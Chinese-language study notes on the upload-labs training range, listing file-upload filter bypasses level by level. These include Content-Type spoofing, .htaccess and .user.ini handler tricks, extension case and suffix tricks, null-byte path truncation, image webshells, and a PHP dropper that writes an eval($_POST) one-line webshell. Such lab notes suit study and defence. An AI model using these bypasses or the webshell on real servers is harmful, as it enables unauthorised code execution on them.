upload靶场

禁用前端js

更改content-type类型

($_FILES['upload_file']['type'] == 'image/jpeg') ||($_FILES['upload_file']['type'] == 'image/png'

​ 上传.php文件抓包修改content-type类型为:image/jpeg、image/png、image/gif

上传未禁止类型

$deny_ext = array('.asp','.aspx','.php','.jsp');

   jsp   jspx   jspf   asp   asa   cer   aspx   php   php3   php4   php5   phtml  

.htaccess文件绕过

上传一个.htaccess文件名的文件内容为

SetHandler application/x-httpd-php 

在上传一个jpg文件

.user.ini

​ 先上传一个内容是的.user.ini文件

auto_prepend_file=5.jpg

​ 然后上传5.jpg文件,复制图像地址,将文件名改为readme.php

大小写绕过

$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");

​ 上传一个.PHP文件,访问文件

空格绕过

$file_ext = trim($file_ext); //首尾去空

​ 上传一个.php文件抓包在后面加空格

.号绕过

$file_name = deldot($file_name);//删除文件名末尾的点

​ 上传一个.php文件抓包在后面加.

特殊字符::$DATA绕过

$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA

​ 上传一个.php文件抓包改后缀名为::$DATA,访问文件去掉::$DATA

拼接名字绕过

$file_name = deldot($file_name);//删除文件名末尾的点
!in_array($file_ext, $deny_ext)
$img_path = UPLOAD_PATH.'/'.$file_name;

​ 上传一个.php文件,改后缀为.php. .

双写绕过

$file_name = str_ireplace($deny_ext,"", $file_name);

​ 只进行了一次过滤 双写文件名为.pphphp

%00截断

$img_path = $_GET['save_path']."/".rand(10,99).date("YmdHis").".".$file_ext;

​ 需要php版本小于5.3.4,并且magic_quotes_gpc关闭,上传.jpg后缀文件

POST /uploadlabs/Pass-12/index.php?save_path=../upload/ HTTP/1.1

更改为

POST /uploadlabs/Pass-12/index.php?save_path=../upload/1.php%00 HTTP/1.1

0x00截断

$img_path = $_POST['save_path']."/".rand(10,99).date("YmdHis").".".$file_ext;

​ POST提交不会自动解码需要在Hex中修改找到p后面的字符改为00后放包上传

图片马

​ 图片马制作

copy zf.jpeg/b + zf.txt/a zf.jpg

​ 直接上传zf.jpg文件利用文件包含漏洞访问,但是注意有时无法通过传参访问,可以通过访问写一个一句话木马上传14.php

<?php 
  $file=fopen('zf.php','w');
  fputs($file,'<?php @eval($_POST['zf']);?>');
?>

修改 Content-Type : multipart/form-data 并更改文件名后缀为可上传的文件

​ 首先上传一个jpg文件更改Content-Type:multipart/form-data 为其中一个为大写及Content-Type:Multipart/form-data绕过

if (strpos($type,“multipart/form-data”) !== False)

由于strpos()函数是区分大小写的所以此方法可以绕过.

allowexts = array('jpg','gif','jpeg','bmp','php4');

由于是白名单所以只能上传php4为后缀的文件